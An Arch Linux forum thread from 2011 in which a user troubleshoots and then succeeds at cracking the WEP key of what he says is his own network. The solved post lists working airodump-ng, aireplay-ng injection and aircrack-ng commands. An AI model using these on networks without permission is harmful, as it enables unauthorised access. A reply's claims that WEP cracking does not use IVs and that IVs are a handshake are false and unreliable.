[SOLVED] Unable to crack my own WEP network

Prowler · 2011-10-17 10:02:09

For a long time I've been trying to do that (crack my 64 bit WEP wi-fi) but have given up because of various problems. For example I have the "Fixed channel -1" problem when aireplay-ing. But yesterday i decided that i could ignore that and just use airodump + aircrack + wget-ing a file .
So the commands i issued before i went to bed were:

airodump-ng --bssid <MACofAP> --channel 8 -w /tmp/overNight  mon0    //on root terminal
while true; do wget <file> -O /dev/null; done
sleep 2h; aircrack /tmp/overNight-01.cap                                            //on root terminal
sleep 4h; aircrack -K /tmp/overNight-01.cap                                        //on root terminal

And so on the morning I found tthe PTW method failing with segmentation error.
The Korek one was just continuing testing keys... The night before I tried to eliminate each method alone using "aircrack -K /tmp/overNight-01.cap -k 1..17" with no success either. Worth noting is that I'm using "rtl8192se" driver.

> lspci | grep -i wireless
03:00.0 Network controller: Realtek Semiconductor Co., Ltd. RTL8191SEvB Wireless LAN Controller (rev 10)

Today I tried backtrack 5. Needed to download and compile the same driver manually, all other related failed to work. I had a segmentation fault again with PTW and got no success with aireplay-ng other that when i issued -1 0 attack I saw a lot of different MACs in airodump. No "Channel -1" as far as i saw but still even the test -9 fails 0/30.

But really, the strangest is how I can't crack the pass with over 1,5 million IVs ! No idea how to proceed now, would be awesome if someone has one

Last edited by Prowler (2011-10-17 17:59:56)

lifeafter2am · 2011-10-17 14:07:08

You don't use IV's to crack WEP, you use IV's to crack WPA (which is a whole other beast). You need to collect entire packets for WEP. If you use Kismet or something similar, they are referred to as "crypted packets".

You literally need to only do three things (if your not actively injecting):

1) airmon-ng to put the card into promiscuous mode (if you can't do this, it will fail)
2) airodump-ng to capture the packets
3) aircrack-ng to crack the key

If there isn't any active traffic on the network (i.e. your not collecting enough crypted packets) then you have to either inject, or wait longer.

Also, no need for all the sleep commands and such. Aircrack is smart, it waits for enough packets and then tries, then waits, then tries, etc. Also have no clue where your wget command comes from.

Lastly, are you using the patched compat-wireless drivers? If you are not promiscuous mode will not work correctly on Arch for the rtl chipsets.

Prowler · 2011-10-17 15:52:26

Thank you for the clearance of the IV term. As you can see, I've collected whole pactets (no --ivs option) on mon0 (which i got up by using airmon start wlan0). So
1: done airmon start wlan0, got

 wlan0		Unknown 	rtl8192se - [phy0]
 				                        (monitor mode enabled on mon0)

2: airodumped on the right channel with the right bssid saving to file
3: used aircrack-ng with both methods

And that wget is because I'm already connected to the wifi im trying to crack (believe that is not a problem, have tried without being connected as far as i remember) and because injecting fails im generating traffic with that wget script The sleep is because i left it for the whole night so wanted to make sure i give everything enough time and the two aircracks dont interfere with each other.

About compat-wireless, I will install these now, but haven't done so because i dont see how not having them would prevent me from airodumping and aircracking properly. Maybe I am mistaken, and these do not impact injection only. Anyway, ill try again with them.

lifeafter2am · 2011-10-17 16:34:38

Prowler wrote:

Thank you for the clearance of the IV term. As you can see, I've collected whole pactets (no --ivs option) on mon0 (which i got up by using airmon start wlan0). So
1: done airmon start wlan0, got
 wlan0		Unknown 	rtl8192se - [phy0]
 				                        (monitor mode enabled on mon0)
2: airodumped on the right channel with the right bssid saving to file
3: used aircrack-ng with both methods
And that wget is because I'm already connected to the wifi im trying to crack (believe that is not a problem, have tried without being connected as far as i remember) and because injecting fails im generating traffic with that wget script The sleep is because i left it for the whole night so wanted to make sure i give everything enough time and the two aircracks dont interfere with each other.
About compat-wireless, I will install these now, but haven't done so because i dont see how not having them would prevent me from airodumping and aircracking properly. Maybe I am mistaken, and these do not impact injection only. Anyway, ill try again with them.

They do impact a few things, including some errors that can happen while using the rtl mon0 interface. Also, afaik you cannot be connected to a wireless network and at the same time have the card running in promiscuous mode. Unless you have a dual mode card, it can't be in infrastructure mode and promiscuous mode at the same time.

I would do this:
1) Install compat-wireless drivers
2) Reboot (so the new drivers are used)
3) Disconnect from the network
4) Use an injection technique

Follow the instructions from this page:
http://www.aircrack-ng.org/doku.php?id= … no_clients

With an injection technique it should only take an hour, MAYBE two, but no longer than that. Most WEP I can crack in about 15 min (30 with my slower netbook).

Prowler · 2011-10-17 17:55:17

Did it! There was one slight thing i missed that caused me to trip on Step 3 of the tutorial - WIFI card has MAC address too. Always entered eth0 mac address on -h... The thing got me running was a post where i read "Wireless mac adress". :

Cracking WEP more quickly:
airodump-ng mon0
airodump-ng -w wep -c [channel] --bssid [bssid number] mon0

open new console
aireplay-ng -1 6000 -a [bssid] -e [router name] -h [my wireless mac] 5 -o 1 -q 10 mon0

open new console
aireplay-ng -2 -b [bssid] -h [my wireless mac] -c FF:FF:FF:FF:FF:FF -p 0841 mon0

Crack:
open new console (4 terminals open now) Data needs to hit about 30,000 from first terminal window
Type dir
aircrack-ng [filename].cap

After following the steps provided i cracked the easy pass of my wep network in ~2 minutes with about 40k data. Thank you for helping me, these compat-wireless drivers really proved to matter. Still don't understand why i can't passively capture and crack without them but Ill have to accept it needs them. Awesome, for a long time this has been my goal ^^ Thank you again

PS:
> Read 81233 packets.
>
> # BSSID ESSID Encryption
>
> 1 54:E6:FC:B1:62:B8 WEPJungle WEP (268 IVs)
> 2 74:EA:3A:C5:F4:9E TP-LINK_C5F49E No data - WEP or WPA
> 3 00:0E:2E:60:E0:91 Rosito WPA (0 handshake)
are u sure IVs arent for WEP? this output came from aircrack, asking me which network when i havent specified...

PS2: gotta add one thing - doing "/etc/rc.d/networkmanager stop" is mandatory. otherwise aireplay wont inject. also the "-o 1 -q 10" options of the second step seem to do nothing, can do fine without em. On the other hand "-p 0841" on the third step is a must, dont inject any data without it. It seems to work with only that value as far as i see, which is very strange cuz its not mentioned almost anywhere in guides.

PS3: updated that guide i followed for better usage: http://pastebin.com/0nPabSJC
PS4: with "aireplay -3" its even easier, even intuitive. In the man page it says its more reliable but it seems to me its a bit slower in the data injecting process. But i guess the benefit is that you never use your ip (i know i can change for the other method too). At least its so easy, just turn it on and wait for some1 to use the net. Saves one terminal
PS5: after checking again, turns out that sometimes i can't aireplay -1 without "-o 1 -q 10".

Last edited by Prowler (2011-10-19 10:00:41)

lifeafter2am · 2011-10-17 19:58:01

aircrack wrote:

As a reminder, the requirement is that you capture the full packet with airodump-ng. Meaning, do not use the “--ivs” option.

IV's are a handshake, you don't want just those for WEP. The weakness of WEP has to do with the header of the full packet, has nothing to do with the handshake.

Prowler · 2011-10-17 22:00:59

lifeafter2am wrote:

aircrack wrote:
As a reminder, the requirement is that you capture the full packet with airodump-ng. Meaning, do not use the “--ivs” option.
IV's are a handshake, you don't want just those for WEP. The weakness of WEP has to do with the header of the full packet, has nothing to do with the handshake.

Okay, then I will take that in this context IV is used to indicate how many full packets there are. Strange but probably true ^^

Arch Linux

#1 2011-10-17 10:02:09

[SOLVED] Unable to crack my own WEP network

#2 2011-10-17 14:07:08

Re: [SOLVED] Unable to crack my own WEP network

#3 2011-10-17 15:52:26

Re: [SOLVED] Unable to crack my own WEP network

#4 2011-10-17 16:34:38

Re: [SOLVED] Unable to crack my own WEP network

#5 2011-10-17 17:55:17

Re: [SOLVED] Unable to crack my own WEP network

#6 2011-10-17 19:58:01

Re: [SOLVED] Unable to crack my own WEP network

#7 2011-10-17 22:00:59

Re: [SOLVED] Unable to crack my own WEP network

Board footer